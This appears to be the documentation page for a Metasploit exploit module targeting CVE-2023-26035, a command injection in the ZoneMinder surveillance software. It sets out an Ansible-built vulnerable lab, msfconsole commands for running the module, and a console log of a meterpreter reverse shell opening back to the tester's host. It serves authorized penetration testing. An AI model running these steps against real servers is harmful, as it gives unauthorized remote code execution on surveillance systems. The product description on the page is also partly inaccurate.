adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
T
Wolfgang Hotwagner 5d5f711dcd updated documentation
2023-11-09 22:40:36 +00:00

155 lines
4.5 KiB
Markdown
Raw Blame History

## Description
This module exploits a command injection that leads to a remote execution in ZoneMinder surveillance software versions before 1.36.33 and before 1.37.33
More about the vulnerability detail: [2023-26035](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26035).
The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload.
The module will check if the target is vulnerable, by sending a sleep command.
## Vulnerable Application
[Zoneminder](https://zoneminder.com/) is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
This module has been tested successfully on Zoneminder versions:
* 1.36.31~64bit on Debian 11
### Source and Installers
* [Source Code Repository](https://github.com/ZoneMinder/zoneminder/tree/1.36.31)
* [Installers](https://zoneminder.readthedocs.io/en/stable/installationguide/index.html)
**The 3rd party debian-repository has packages for the vulnerable versions(for example zoneminder=1.36.31-bullseye1)**
### Ansible Installation
This exploit was tested using [a debian bullseye cloudimage](https://cloud.debian.org/images/cloud/bullseye/20210814-734/)
with the following ansible-roles:
```yaml
roles:
- src: https://github.com/ait-cs-IaaS/atb-ansible-zoneminder.git
version: v1.2
name: zoneminder
- src: https://github.com/ait-cs-IaaS/atb-ansible-debiansnapshot.git
version: v1.2
name: debiansnapshot
- src: https://github.com/ait-cs-IaaS/ansible-mariadb.git
version: v1.0.0
name: mariadb
- src: https://github.com/ait-cs-IaaS/ansible-apache2.git
version: v1.3
name: apache2
```
Zoneminder was deployed using the following playbook:
```yaml
- name: Install old Debian-Archive-Repo Host
hosts: all
remote_user: debian
become: true
vars:
debsnap_timestamp: 20210815T082041Z
debsnap_debrelease: bullseye
roles:
- role: debiansnapshot
- name: Install Videoserver Host
hosts: all
remote_user: debian
become: true
tasks:
- name: Install Videoserver Packages
ansible.builtin.apt:
pkg:
- vim
- curl
- netcat-traditional
update_cache: yes
roles:
- role: mariadb
- role: apache2
vars:
apache2_modules:
- name: "headers"
- name: "rewrite"
- name: "expires"
- name: "cgi"
apache2_vhosts:
- name: default
http: true
vhost_template: "redir.j2"
- role: zoneminder
vars:
zoneminder_debrelease: bullseye
```
The following template-file("redir.j2") for apache2 redirects requests to the
zoneminder subdirectory:
```
<VirtualHost *:80>
ServerName {{ item.name }}
{% if item.aliases is defined %}
ServerAlias {{ item.aliases|join(' ') }}
{% endif %}
DocumentRoot {{ apache2_vhost_dir }}/{{ item.name }}
RedirectMatch ^/$ /zm/
ErrorLog {{ apache2_vhost_dir }}/{{ item.name }}/log/error.log
CustomLog {{ apache2_vhost_dir }}/{{ item.name }}/log/access.log combined
<Directory "{{ apache2_vhost_dir }}/{{ item.name }}">
Options FollowSymLinks MultiViews
AllowOverride All
Require all granted
</Directory>
</VirtualHost>
```
## Verification Steps
Example steps in this format (is also in the PR):
1. Do: `use exploit/unix/webapp/zoneminder_snapshots`
2. Do: `set RHOSTS [ips]`
3. Do: `set LHOST [lhost]`
4. Do: `run`
5. You should get a shell.
## Options
### TARGETURI
Remote web path to the zoneminder installation (default: /zm/)
## Scenarios
In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is
192.42.1.188.
### Zoneminder 1.36.31-bullseye1
The following demo shows how to use the exploit with minimal settings:
```
msf6 exploit(unix/webapp/zoneminder_snapshots) > run
[*] Started reverse TCP handler on 192.42.1.188:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Elapsed time: 10.249642733018845 seconds.
[+] The target appears to be vulnerable.
[*] Fetching CSRF Token
[+] Got Token: key:b5da21a154bc5f46cd2b3648fe9e44931dd74bac,1697109606
[*] Executing nix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending payload
[*] Sending stage (3045380 bytes) to 192.42.0.254
[*] Meterpreter session 1 opened (192.42.1.188:4444 -> 192.42.0.254:56398) at 2023-10-12 11:20:07 +0000
[+] Payload sent
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink